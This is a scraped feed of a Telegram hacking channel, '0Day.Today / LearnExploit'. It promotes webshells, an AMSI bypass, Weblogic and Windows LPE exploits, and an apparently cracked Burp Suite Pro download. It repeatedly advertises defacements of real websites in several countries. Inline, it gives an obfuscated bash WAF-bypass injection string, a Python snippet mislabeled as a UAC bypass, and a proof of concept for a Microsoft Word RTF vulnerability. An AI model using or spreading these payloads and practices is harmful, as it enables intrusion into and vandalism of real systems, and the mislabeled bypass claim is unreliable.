0Day.Today | Learn Exploit | Zero World | Dark web |
18.8K subscribers
1.23K photos
123 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
Trackgram

Use Instagram location features to track an account

Github

#tools #instagram
——————⁧
0Day.Today
@LearnExploit
@Tech_Army
👍4
ALL IN ONE INFORMATION GATHERING TOOLS

OSINT.SH

#Osint #tools
——————⁧
0Day.Today
@LearnExploit
@Tech_Army
👍3
Various webshells

Github

#shell #collection
——————⁧
0Day.Today
@LearnExploit
@Tech_Army
3
Lifetime AMSI bypass

Github

#Win32 #bypass
——————⁧
0Day.Today
@LearnExploit
@Tech_Army
Weblogic CVE-2023-21839 RCE

Github

#CVE #RCE
——————⁧
0Day.Today
@LearnExploit
@Tech_Army
👍3🔥1🍾1
bash injection bypass waf

$0<<<$\'\\$(($((1<<1))#10011010))\\$(($((1<<1))#10100011))\'

#bypass #Waf
——————⁧
0Day.Today
@LearnExploit
@Tech_Army
👍6
👁 Site
🌐 Zone-h

#Deface

BugCod3

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/Tech_Army
👍21
This code will bypass the UAC prompt, running a command as an Administrator.

`command = "insert command here"
process = subprocess.Popen(['powershell.exe', 'Start-Process', command, '-Verb', 'runAs'], stdout=subprocess.PIPE)
process.communicate()[0]`

#UAC #Bypass
——————⁧
0Day.Today
@LearnExploit
@Tech_Army
1👍1
burpsuite_pro_v2023.2.2.zip
563.7 MB
Burp Suite Version 2023.2.2

آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java runtime ورژن 9 به بالا و Java JDK نیاز خواهید داشت . *

Pass : 311138

#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-21716(Microsoft Word RCE vuln) Python PoC

open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))

#CVE #RCE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
4👎1
👁 Site
🌐 Mirror-h

Country: 🇦🇺

#Deface

BugCod3

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/Tech_Army
1
👁 Site
🌐 Mirror-h

Country: 🇺🇸

#Deface

BugCod3

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/Tech_Army
👍21
👁 Site
🌐 Mirror-h

Country: 🇧🇷

#Deface

BugCod3

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/Tech_Army
2
👁 Site
🌐 Mirror-h

Country: 🇦🇺

#Deface

BugCod3

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/Tech_Army
1
👁 Site
🌐 Mirror-h

Country: 🇺🇸

#Deface

BugCod3

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/Tech_Army
Practice shell

If you support the channels, there are many shell and tools to share with you

Enjoy... ⭐️

🔗 Link

#Shell

BugCod3

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/Tech_Army
👌3👍1🔥1
CVE-2023-21768

LPE exploit for CVE-2023-21768

Github

#CVE #Exploit #lpe
——————
0Day.Today
@LearnExploit
@Tech_Army
👁 Site
🌐 Mirror-h

Country: 🇺🇸

#Deface

BugCod3

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/Tech_Army
👍5👎1
👁 Site
🌐 Mirror-h

Country: 🇺🇸

#Deface

BugCod3

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/Tech_Army
3👍1
👁 Site
🌐 Mirror-h

Country: 🇺🇦

#Deface

BugCod3

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/Tech_Army
👍3